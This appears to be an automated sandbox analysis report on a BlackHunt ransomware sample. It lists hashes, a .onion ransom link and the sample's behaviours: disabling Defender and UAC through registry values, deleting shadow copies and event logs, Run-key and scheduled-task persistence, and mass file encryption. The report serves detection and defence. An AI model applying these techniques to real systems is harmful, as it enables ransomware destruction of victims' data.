Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19/01/2024, 00:11
Static task
static1
Behavioral task
behavioral1
Sample
926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe
Resource
win10v2004-20231222-en
General
-
Target
926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe
-
Size
707KB
-
MD5
c6f5a924509a0c0703e2e0d695e68c2b
-
SHA1
d6606748c85581464fcce6ae4930465dd618e17c
-
SHA256
926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830
-
SHA512
e33fcc65da0fc324fa1cd6d3fe3361dfe6b300a4df3557d97b1c10e991d7ae99b2466aba11cd0cae8341d50d371afa8e26f00ac3077ea4de45bbc2c46c809249
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza138Gvnh:6uaTmkZJ+naie5OTamgEoKxLWe4h
Malware Config
Extracted
C:\MSOCache\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 3968 fsutil.exe 4072 fsutil.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 2832 wevtutil.exe 3244 wevtutil.exe 2692 wevtutil.exe 2592 wevtutil.exe 3616 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 3836 bcdedit.exe 3984 bcdedit.exe 3904 bcdedit.exe 1596 bcdedit.exe -
Renames multiple (2916) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 3976 wbadmin.exe 892 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 3628 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\O: 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened (read-only) \??\J: 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\L: 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened (read-only) \??\Z: 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened (read-only) \??\X: 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened (read-only) \??\S: 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened (read-only) \??\N: 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened (read-only) \??\T: 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened (read-only) \??\Y: 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened (read-only) \??\P: 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened (read-only) \??\A: 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\V: 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened (read-only) \??\M: 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened (read-only) \??\R: 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened (read-only) \??\I: 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened (read-only) \??\B: 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Q: 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened (read-only) \??\U: 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened (read-only) \??\E: 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened (read-only) \??\G: 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened (read-only) \??\H: 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened (read-only) \??\K: 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\MANIFEST.MF 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\#BlackHunt_ReadMe.txt 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\#BlackHunt_Private.key 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_zh_CN.jar 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#BlackHunt_ReadMe.txt 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File created C:\Program Files\VideoLAN\VLC\plugins\control\#BlackHunt_ReadMe.hta 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Shanghai 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tbilisi 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\license.html 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluHandle.png 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\#BlackHunt_ReadMe.txt 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\#BlackHunt_Private.key 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Norfolk 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_blu.css 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\dnsns.jar 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\#BlackHunt_ReadMe.txt 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\#BlackHunt_ReadMe.hta 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\README-JDK.html 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\#BlackHunt_ReadMe.hta 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs-nio2.xml 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jre7\lib\plugin.jar 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\#BlackHunt_Private.key 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Christmas 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\7-Zip\Lang\ga.txt 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vilnius 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf_3.4.0.v20140827-1444.jar 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\#BlackHunt_ReadMe.txt 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\7-Zip\Lang\hr.txt 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Page.wmv 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\PST8 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File created C:\Program Files\Java\jre7\#BlackHunt_ReadMe.hta 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_extractor\#BlackHunt_Private.key 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\#BlackHunt_Private.key 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\epl-v10.html 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\#BlackHunt_ReadMe.txt 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\#BlackHunt_ReadMe.txt 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\#BlackHunt_ReadMe.txt 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.ja_5.5.0.165303.jar 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui_5.5.0.165303.jar 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_zh_CN.jar 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_ja.jar 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationLeft_ButtonGraphic.png 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ashgabat 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\#BlackHunt_ReadMe.txt 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\#BlackHunt_ReadMe.txt 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Rothera 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet_3.0.0.v201112011016.jar 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_ja_4.4.0.v20140623020002.jar 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\#BlackHunt_Private.key 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\#BlackHunt_ReadMe.txt 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\#BlackHunt_ReadMe.hta 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-heapwalker.xml 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Belize 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvDX9.x3d 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Lima 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_zh_4.4.0.v20140623020002.jar 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\#BlackHunt_ReadMe.txt 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_plain_Thumbnail.bmp 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi_3.10.1.v20140909-1633.jar 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2060 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3788 vssadmin.exe 3488 vssadmin.exe 632 vssadmin.exe 2620 vssadmin.exe 3160 vssadmin.exe 3148 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 3900 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1804 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1272 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe Token: SeRestorePrivilege 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe Token: SeBackupPrivilege 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe Token: SeTakeOwnershipPrivilege 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe Token: SeAuditPrivilege 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe Token: SeSecurityPrivilege 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe Token: SeIncBasePriorityPrivilege 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe Token: SeBackupPrivilege 2016 vssvc.exe Token: SeRestorePrivilege 2016 vssvc.exe Token: SeAuditPrivilege 2016 vssvc.exe Token: SeBackupPrivilege 1292 wbengine.exe Token: SeRestorePrivilege 1292 wbengine.exe Token: SeSecurityPrivilege 1292 wbengine.exe Token: SeSecurityPrivilege 3244 wevtutil.exe Token: SeBackupPrivilege 3244 wevtutil.exe Token: SeSecurityPrivilege 2692 wevtutil.exe Token: SeBackupPrivilege 2692 wevtutil.exe Token: SeSecurityPrivilege 2592 wevtutil.exe Token: SeBackupPrivilege 2592 wevtutil.exe Token: SeDebugPrivilege 3900 taskkill.exe Token: SeSecurityPrivilege 3616 wevtutil.exe Token: SeBackupPrivilege 3616 wevtutil.exe Token: SeSecurityPrivilege 2832 wevtutil.exe Token: SeBackupPrivilege 2832 wevtutil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2192 wrote to memory of 3044 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 29 PID 2192 wrote to memory of 3044 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 29 PID 2192 wrote to memory of 3044 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 29 PID 2192 wrote to memory of 3044 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 29 PID 2192 wrote to memory of 2680 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 31 PID 2192 wrote to memory of 2680 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 31 PID 2192 wrote to memory of 2680 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 31 PID 2192 wrote to memory of 2680 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 31 PID 3044 wrote to memory of 2200 3044 cmd.exe 32 PID 3044 wrote to memory of 2200 3044 cmd.exe 32 PID 3044 wrote to memory of 2200 3044 cmd.exe 32 PID 2192 wrote to memory of 2800 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 39 PID 2192 wrote to memory of 2800 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 39 PID 2192 wrote to memory of 2800 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 39 PID 2192 wrote to memory of 2800 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 39 PID 2192 wrote to memory of 2908 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 36 PID 2192 wrote to memory of 2908 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 36 PID 2192 wrote to memory of 2908 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 36 PID 2192 wrote to memory of 2908 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 36 PID 2192 wrote to memory of 2696 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 35 PID 2192 wrote to memory of 2696 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 35 PID 2192 wrote to memory of 2696 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 35 PID 2192 wrote to memory of 2696 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 35 PID 2800 wrote to memory of 2796 2800 cmd.exe 43 PID 2800 wrote to memory of 2796 2800 cmd.exe 43 PID 2800 wrote to memory of 2796 2800 cmd.exe 43 PID 2908 wrote to memory of 2728 2908 cmd.exe 42 PID 2908 wrote to memory of 2728 2908 cmd.exe 42 PID 2908 wrote to memory of 2728 2908 cmd.exe 42 PID 2696 wrote to memory of 2572 2696 cmd.exe 40 PID 2696 wrote to memory of 2572 2696 cmd.exe 40 PID 2696 wrote to memory of 2572 2696 cmd.exe 40 PID 2680 wrote to memory of 2576 2680 cmd.exe 41 PID 2680 wrote to memory of 2576 2680 cmd.exe 41 PID 2680 wrote to memory of 2576 2680 cmd.exe 41 PID 2192 wrote to memory of 2792 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 44 PID 2192 wrote to memory of 2792 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 44 PID 2192 wrote to memory of 2792 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 44 PID 2192 wrote to memory of 2792 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 44 PID 2192 wrote to memory of 2808 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 47 PID 2192 wrote to memory of 2808 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 47 PID 2192 wrote to memory of 2808 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 47 PID 2192 wrote to memory of 2808 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 47 PID 2192 wrote to memory of 1808 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 51 PID 2192 wrote to memory of 1808 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 51 PID 2192 wrote to memory of 1808 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 51 PID 2192 wrote to memory of 1808 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 51 PID 2192 wrote to memory of 2760 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 49 PID 2192 wrote to memory of 2760 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 49 PID 2192 wrote to memory of 2760 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 49 PID 2192 wrote to memory of 2760 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 49 PID 2192 wrote to memory of 2580 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 154 PID 2192 wrote to memory of 2580 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 154 PID 2192 wrote to memory of 2580 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 154 PID 2192 wrote to memory of 2580 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 154 PID 2192 wrote to memory of 2976 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 55 PID 2192 wrote to memory of 2976 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 55 PID 2192 wrote to memory of 2976 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 55 PID 2192 wrote to memory of 2976 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 55 PID 2792 wrote to memory of 2600 2792 cmd.exe 57 PID 2792 wrote to memory of 2600 2792 cmd.exe 57 PID 2792 wrote to memory of 2600 2792 cmd.exe 57 PID 2192 wrote to memory of 2292 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 56 PID 2192 wrote to memory of 2292 2192 926c983c86cf8000f27ed530fb6ecc1523866425788e8df0e1a7797e254e2830.exe 56 -
System policy modification 1 TTPs 3 IoCs
